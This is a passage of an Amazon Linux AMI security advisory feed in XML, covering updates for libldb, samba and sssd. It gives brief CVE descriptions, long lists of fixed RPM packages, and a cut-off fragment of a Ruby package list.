name="ruby19-debuginfo" version="1.9.3.551" release="32.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-debuginfo-1.9.3.551-32.70.amzn1.x86_64.rpm</filename></package><package name="ruby19" version="1.9.3.551" release="32.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-1.9.3.551-32.70.amzn1.x86_64.rpm</filename></package><package name="rubygem19-minitest" version="2.5.1" release="32.70.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-minitest-2.5.1-32.70.amzn1.noarch.rpm</filename></package><package name="rubygem19-rdoc" version="3.9.5" release="32.70.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-rdoc-3.9.5-32.70.amzn1.noarch.rpm</filename></package><package name="rubygem19-json" version="1.5.5" release="32.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-json-1.5.5-32.70.amzn1.x86_64.rpm</filename></package><package name="rubygem19-io-console" version="0.3" release="32.70.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-io-console-0.3-32.70.amzn1.i686.rpm</filename></package><package name="ruby19-libs" version="1.9.3.551" release="32.70.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-libs-1.9.3.551-32.70.amzn1.i686.rpm</filename></package><package name="rubygem19-bigdecimal" version="1.1.0" release="32.70.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-bigdecimal-1.1.0-32.70.amzn1.i686.rpm</filename></package><package name="ruby19-devel" version="1.9.3.551" release="32.70.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-devel-1.9.3.551-32.70.amzn1.i686.rpm</filename></package><package name="ruby19" version="1.9.3.551" release="32.70.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-1.9.3.551-32.70.amzn1.i686.rpm</filename></package><package name="ruby19-doc" version="1.9.3.551" release="32.70.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-doc-1.9.3.551-32.70.amzn1.i686.rpm</filename></package><package name="rubygem19-json" version="1.5.5" release="32.70.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-json-1.5.5-32.70.amzn1.i686.rpm</filename></package><package name="ruby19-debuginfo" version="1.9.3.551" release="32.70.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-debuginfo-1.9.3.551-32.70.amzn1.i686.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.648" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-debuginfo-2.0.0.648-1.29.amzn1.x86_64.rpm</filename></package><package name="rubygems20" version="2.0.14.1" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-2.0.14.1-1.29.amzn1.noarch.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-bigdecimal-1.2.0-1.29.amzn1.x86_64.rpm</filename></package><package name="ruby20" version="2.0.0.648" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-2.0.0.648-1.29.amzn1.x86_64.rpm</filename></package><package name="ruby20-libs" version="2.0.0.648" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-libs-2.0.0.648-1.29.amzn1.x86_64.rpm</filename></package><package name="ruby20-doc" version="2.0.0.648" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-doc-2.0.0.648-1.29.amzn1.noarch.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-psych-2.0.0-1.29.amzn1.x86_64.rpm</filename></package><package name="ruby20-devel" version="2.0.0.648" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-devel-2.0.0.648-1.29.amzn1.x86_64.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-io-console-0.4.2-1.29.amzn1.x86_64.rpm</filename></package><package name="rubygems20-devel" version="2.0.14.1" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-devel-2.0.14.1-1.29.amzn1.noarch.rpm</filename></package><package name="ruby20-irb" version="2.0.0.648" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-irb-2.0.0.648-1.29.amzn1.noarch.rpm</filename></package><package name="ruby20" version="2.0.0.648" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-2.0.0.648-1.29.amzn1.i686.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-io-console-0.4.2-1.29.amzn1.i686.rpm</filename></package><package name="ruby20-libs" version="2.0.0.648" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-libs-2.0.0.648-1.29.amzn1.i686.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.648" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-debuginfo-2.0.0.648-1.29.amzn1.i686.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-bigdecimal-1.2.0-1.29.amzn1.i686.rpm</filename></package><package name="ruby20-devel" version="2.0.0.648" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-devel-2.0.0.648-1.29.amzn1.i686.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-psych-2.0.0-1.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-633</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-633: medium priority package update for libldb</title><issued date="2016-01-18 11:00:00" /><updated date="2016-01-18 11:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5330:
A memory-read flaw was found in the way the libldb library processed LDB DN records with a null byte. An authenticated, remote attacker could use this flaw to read heap-memory pages from the server.
1281326:
CVE-2015-5330 samba, libldb: remote memory read in the Samba LDAP server
CVE-2015-3223:
A denial of service flaw was found in the ldb_wildcard_compare() function of libldb. A remote attacker could send a specially crafted packet that, when processed by an application using libldb (for example the AD LDAP server in Samba), would cause that application to consume an excessive amount of memory and crash.
1290287:
CVE-2015-3223 libldb: Remote DoS in Samba (AD) LDAP server
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3223" title="" id="CVE-2015-3223" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5330" title="" id="CVE-2015-5330" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="pyldb" version="1.1.20" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/pyldb-1.1.20-1.7.amzn1.x86_64.rpm</filename></package><package name="ldb-tools" version="1.1.20" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/ldb-tools-1.1.20-1.7.amzn1.x86_64.rpm</filename></package><package name="libldb" version="1.1.20" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libldb-1.1.20-1.7.amzn1.x86_64.rpm</filename></package><package name="pyldb-devel" version="1.1.20" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/pyldb-devel-1.1.20-1.7.amzn1.x86_64.rpm</filename></package><package name="libldb-debuginfo" version="1.1.20" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libldb-debuginfo-1.1.20-1.7.amzn1.x86_64.rpm</filename></package><package name="libldb-devel" version="1.1.20" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libldb-devel-1.1.20-1.7.amzn1.x86_64.rpm</filename></package><package name="pyldb" version="1.1.20" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/pyldb-1.1.20-1.7.amzn1.i686.rpm</filename></package><package name="pyldb-devel" version="1.1.20" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/pyldb-devel-1.1.20-1.7.amzn1.i686.rpm</filename></package><package name="libldb-devel" version="1.1.20" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/libldb-devel-1.1.20-1.7.amzn1.i686.rpm</filename></package><package name="libldb-debuginfo" version="1.1.20" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/libldb-debuginfo-1.1.20-1.7.amzn1.i686.rpm</filename></package><package name="ldb-tools" version="1.1.20" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/ldb-tools-1.1.20-1.7.amzn1.i686.rpm</filename></package><package name="libldb" version="1.1.20" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/libldb-1.1.20-1.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-634</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-634: medium priority package update for samba</title><issued date="2016-01-18 11:00:00" /><updated date="2016-01-18 11:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5330:
A memory-read flaw was found in the way the libldb library processed LDB DN records with a null byte. An authenticated, remote attacker could use this flaw to read heap-memory pages from the server.
1281326:
CVE-2015-5330 samba, libldb: remote memory read in the Samba LDAP server
CVE-2015-5299:
A missing access control flaw was found in Samba. A remote, authenticated attacker could use this flaw to view the current snapshot on a Samba share, despite not having DIRECTORY_LIST access rights.
1276126:
CVE-2015-5299 Samba: Missing access control check in shadow copy code
CVE-2015-5296:
A man-in-the-middle vulnerability was found in the way &quot;connection signing&quot; was implemented by Samba. A remote attacker could use this flaw to downgrade an existing Samba client connection and force the use of plain text.
1290292:
CVE-2015-5296 samba: client requesting encryption vulnerable to downgrade attack
CVE-2015-5252:
An access flaw was found in the way Samba verified symbolic links when creating new files on a Samba share. A remote attacker could exploit this flaw to gain access to files outside of Samba&#039;s share path.
1290288:
CVE-2015-5252 samba: Insufficient symlink verification in smbd
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5252" title="" id="CVE-2015-5252" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5296" title="" id="CVE-2015-5296" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5299" title="" id="CVE-2015-5299" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5330" title="" id="CVE-2015-5330" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="samba-libs" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-libs-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="libsmbclient" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="samba-pidl" version="4.2.3" release="11.28.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-pidl-4.2.3-11.28.amzn1.noarch.rpm</filename></package><package name="samba-winbind" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="samba-test-libs" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-libs-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="samba-common-libs" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-libs-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="samba" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="samba-debuginfo" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-debuginfo-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="samba-devel" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-devel-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="ctdb-devel" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-devel-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-modules" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-modules-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="samba-client" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="ctdb-tests" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-tests-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="samba-common-tools" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-tools-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="ctdb" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="samba-python" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-krb5-locator-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="samba-test-devel" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-devel-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-clients" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-clients-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="samba-client-libs" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-libs-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="libsmbclient-devel" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-devel-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="samba-common" version="4.2.3" release="11.28.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-common-4.2.3-11.28.amzn1.noarch.rpm</filename></package><package name="samba-test" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="libwbclient-devel" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-devel-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="libwbclient" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="samba-devel" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/samba-devel-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="libsmbclient-devel" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-devel-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="samba-winbind-modules" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-modules-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="ctdb-tests" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-tests-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="samba-client" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="samba-debuginfo" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/samba-debuginfo-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="samba-libs" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/samba-libs-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="samba-winbind" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="samba-test" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="samba-client-libs" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-libs-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="samba-common-libs" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-libs-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="libwbclient-devel" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-devel-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="ctdb" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="samba-test-libs" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-libs-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="samba-test-devel" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-devel-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-krb5-locator-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="samba" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/samba-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="samba-common-tools" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-tools-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="samba-winbind-clients" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-clients-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="libsmbclient" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="samba-python" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="libwbclient" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="ctdb-devel" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-devel-4.2.3-11.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-635</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-635: low priority package update for sssd</title><issued date="2016-01-18 11:00:00" /><updated date="2016-01-18 11:00:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5292:
It was found that SSSD&#039;s Privilege Attribute Certificate (PAC) responder plug-in would leak a small amount of memory on each authentication request. A remote attacker could potentially use this flaw to exhaust all available memory on the system by making repeated requests to a Kerberized daemon application configured to authenticate using the PAC responder plug-in.
1267580:
CVE-2015-5292 sssd: memory leak in the sssd_pac_plugin
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5292" title="" id="CVE-2015-5292" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libsss_nss_idmap-devel" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_nss_idmap-devel-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="sssd-debuginfo" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-debuginfo-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="sssd-krb5-common" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-krb5-common-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="libsss_idmap" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_idmap-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="libsss_simpleifp-devel" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_simpleifp-devel-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="sssd-ipa" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ipa-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="sssd-client" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-client-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="sssd-libwbclient" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-libwbclient-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="python27-sssdconfig" version="1.13.0" release="40.6.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-sssdconfig-1.13.0-40.6.amzn1.noarch.rpm</filename></package><package name="libipa_hbac" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libipa_hbac-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="libsss_simpleifp" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_simpleifp-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="python27-libsss_nss_idmap" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libsss_nss_idmap-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="sssd-ldap" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ldap-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="sssd-common" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-common-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="sssd-tools" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-tools-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="sssd-ad" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ad-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="sssd-libwbclient-devel" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-libwbclient-devel-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="libsss_idmap-devel" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_idmap-devel-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="python27-sss" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-sss-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="sssd-dbus" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-dbus-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="sssd-common-pac" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-common-pac-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="sssd-proxy" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-proxy-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="libipa_hbac-devel" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libipa_hbac-devel-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="python27-sss-murmur" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-sss-murmur-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="sssd" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="sssd-krb5" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-krb5-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="libsss_nss_idmap" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_nss_idmap-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="python27-libipa_hbac" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libipa_hbac-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="sssd-libwbclient" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-libwbclient-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="libipa_hbac-devel" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/libipa_hbac-devel-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="libsss_simpleifp" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_simpleifp-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="sssd" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="sssd-common-pac" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-common-pac-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="sssd-ldap" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ldap-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="sssd-dbus" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-dbus-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="sssd-ad" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ad-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="sssd-proxy" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-proxy-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="python27-sss" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/python27-sss-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="python27-libsss_nss_idmap" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libsss_nss_idmap-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="libsss_idmap" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_idmap-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="sssd-ipa" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ipa-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="sssd-tools" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-tools-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="python27-libipa_hbac" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libipa_hbac-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="sssd-krb5-common" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-krb5-common-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="sssd-common" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-common-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="libsss_simpleifp-devel" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_simpleifp-devel-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="sssd-debuginfo" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-debuginfo-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="sssd-krb5" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-krb5-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="libsss_nss_idmap" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_nss_idmap-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="libsss_nss_idmap-devel" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_nss_idmap-devel-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="libsss_idmap-devel" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_idmap-devel-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="libipa_hbac" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/libipa_hbac-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="python27-sss-murmur" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/python27-sss-murmur-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="sssd-libwbclient-devel" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-libwbclient-devel-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="sssd-client" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-client-1.13.0-40.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-636</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-636: medium priority package update for 